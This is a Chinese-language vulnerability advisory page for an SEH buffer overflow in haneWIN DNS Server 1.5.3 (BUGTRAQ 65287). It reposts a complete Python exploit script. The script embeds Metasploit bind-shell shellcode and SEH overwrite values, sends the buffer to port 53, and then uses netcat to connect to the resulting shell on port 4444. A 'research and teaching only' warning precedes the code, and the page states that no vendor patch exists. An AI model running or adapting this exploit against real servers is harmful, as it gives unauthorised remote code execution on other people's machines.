发布日期:2014-01-29 更新日期:2014-02-19受影响系统: hanewin haneWIN DNS Server 1.5.3 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 65287haneWIN DNS Server是Windows平台上的DNS服务器。haneWIN DNS Server 1.5.3及其他版本在处理大量数据时存在SEH溢出,攻击者可利用此漏洞在应用上下文中执行任意代码。<*来源:Dario Estrada *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!#!/usr/bin/python
# Exploit Title: haneWIN DNS Server (SEH) # Author: Dario Estrada (dash) https://intrusionlabs.org # Date: 2014-01-29 # Version: haneWIN DNS Server 1.5.3 # Vendor Homepage: http://www.hanewin.net/ # Vulnerable app link:http://www.hanewin.net/dns-e.htm # Tested on: Windows XP SP3 # Thanks to God, to my family and all my friends for always being there # # Description: # A SEH overflow occurs when large amount of data is sent to the server # import socket, sys, os, time
usage = "
Usage: " + sys.argv[0] + " <host>
"
if len(sys.argv) < 2: print usage sys.exit(0)
host = sys.argv[1]shellcode = ( #msfpayload windows/shell_bind_tcp R | msfencode -t c -b "x00xffx0ax0d" "xb8xdfx64x04x29xd9xc7xd9x74x24xf4x5dx29xc9xb1" "x56x31x45x13x83xedxfcx03x45xd0x86xf1xd5x06xcf" "xfax25xd6xb0x73xc0xe7xe2xe0x80x55x33x62xc4x55" "xb8x26xfdxeexccxeexf2x47x7axc9x3dx58x4axd5x92" "x9axccxa9xe8xcex2ex93x22x03x2exd4x5fxebx62x8d" "x14x59x93xbax69x61x92x6cxe6xd9xecx09x39xadx46" "x13x6ax1dxdcx5bx92x16xbax7bxa3xfbxd8x40xeax70" "x2ax32xedx50x62xbbxdfx9cx29x82xefx11x33xc2xc8" "xc9x46x38x2bx74x51xfbx51xa2xd4x1exf1x21x4exfb" "x03xe6x09x88x08x43x5dxd6x0cx52xb2x6cx28xdfx35" "xa3xb8x9bx11x67xe0x78x3bx3ex4cx2fx44x20x28x90" "xe0x2axdbxc5x93x70xb4x2axaex8ax44x24xb9xf9x76" "xebx11x96x3ax64xbcx61x3cx5fx78xfdxc3x5fx79xd7" "x07x0bx29x4fxa1x33xa2x8fx4exe6x65xc0xe0x58xc6" "xb0x40x08xaexdax4ex77xcexe4x84x0exc8x2axfcx43" "xbfx4ex02x72x63xc6xe4x1ex8bx8exbfxb6x69xf5x77" "x21x91xdfx2bxfax05x57x22x3cx29x68x60x6fx86xc0" "xe3xfbxc4xd4x12xfcxc0x7cx5cxc5x83xf7x30x84x32" "x07x19x7exd6x9axc6x7ex91x86x50x29xf6x79xa9xbf" "xeax20x03xddxf6xb5x6cx65x2dx06x72x64xa0x32x50" "x76x7cxbaxdcx22xd0xedx8ax9cx96x47x7dx76x41x3b" "xd7x1ex14x77xe8x58x19x52x9ex84xa8x0bxe7xbbx05" "xdcxefxc4x7bx7cx0fx1fx38x8cx5ax3dx69x05x03xd4" "x2bx48xb4x03x6fx75x37xa1x10x82x27xc0x15xcexef" "x39x64x5fx9ax3dxdbx60x8f" )nSEH = "xebx06x90x90" SEH = "xd1x07xfcx7f" opcode = "xe9xdfxf6xffxff" junk = "A" * (2324 - len(shellcode)) padding = "A" * 600buff = shellcode + junk + nSEH + SEH + opcode + paddingprint "[+] Connecting to %s:53" % (host) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, 53)) aix= shellcode + "A" * (2324 - len(shellcode)) print "[*] Sending payload.." + " shellcode: " + str(len(shellcode)) s.send(buff) print "[*] Exploit Sent Successfully!" s.close() print "[+] Waiting for 5 sec before spawning shell to " + host + ":4444
" time.sleep(5) os.system ("nc -n " + host + " 4444") except: print "[!] Could not connect to " + host + ":53
" sys.exit(0)建议: -------------------------------------------------------------------------------- 厂商补丁:hanewin ------- 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.hanewin.net/dns-e.htmfwsnort "fwsnort.conf"本地权限提升漏洞PCMan"s FTP Server "CWD"命令缓冲区溢出漏洞相关资讯 haneWIN DNS Server 本文评论 查看全部评论 (0)
易网时代-编程资源站